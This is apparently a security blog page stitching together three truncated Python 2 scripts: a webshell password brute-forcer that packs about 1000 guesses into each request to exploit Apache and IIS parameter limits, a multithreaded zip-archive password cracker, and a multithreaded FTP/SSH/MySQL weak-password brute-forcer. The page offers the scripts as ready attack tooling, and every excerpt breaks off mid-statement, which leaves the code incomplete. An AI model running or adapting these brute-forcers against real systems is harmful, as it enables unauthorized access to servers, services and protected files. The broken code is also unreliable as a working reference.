Using Multiple Parameters to Speed Up Webshell Brute-Forcing

0x00 Principle

I previously saw this idea at https://www.t00ls.net/viewthread.php?tid=36985. By default Apache accepts up to 1000 parameters in a single request and IIS accepts up to 5883, so multiple passwords can be submitted in one request, which makes brute-forcing fast.

0x01 Webshell brute-force code

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    # code by reber <1070018473@qq.com>

    import sys
    import requests

    proxy = {'http':'http://127.0.0.1:8080'}
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'application/x-www-form-urlencoded',
    }

    def get_file(filename):
        data = []
        with open(filename,'r') as f:
            lines = f.readlines()
            for line in lines:
                data.append(line.strip())
        return data

    def get_payloads(data):
        payloads = []
        for x in xrange(0,10):
            print x*1000,(x+1)*1000
            payload = []
            for y in data[x*1000:(x+1)*1000]:
                payload.


Brute-Forcing Zip Archives with Python

0x00 Code

Multithreaded brute-forcing of an encrypted zip archive

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-

    import sys
    import optparse
    import zipfile
    import threading
    import Queue

    queue = Queue.Queue()
    lock = threading.Lock()
    result = ''

    def load_pwd(filename):
        for line in open(filename,'r'):
            if line:
                queue.put(line.strip())

    def bruter(zipname,queue):
        global result
        zFile = zipfile.ZipFile(zipname)
        while not queue.empty():
            password = queue.get()
            try:
                zFile.extractall(pwd=password) # extract the archive
                lock.acquire()
                print "[Ok] password is: %s" % password
                lock.release()
                result = password
            except:
                lock.acquire()
                print "[Error] password not is: %s" % password
                lock.


Multithreaded Weak-Password Brute-Forcing in Python

0x00 Script

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-

    'this script can bruter ftp/ssh/mysql'

    __author__ = 'reber'

    import Queue
    import threading
    import time
    import logging
    import socket
    from optparse import OptionParser

    import paramiko
    from ftplib import FTP
    import MySQLdb

    ################# Common class #################
    class CommonFun(object):
        """docstring for CommonFun"""
        def __init__(self):
            super(CommonFun, self).__init__()

        def set_log(self,lname):
            logger = logging.getLogger(lname)
            logger.setLevel(logging.DEBUG)

            ch = logging.StreamHandler()
            ch.setLevel(logging.DEBUG)

            formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
            ch.setFormatter(formatter)

            logger.


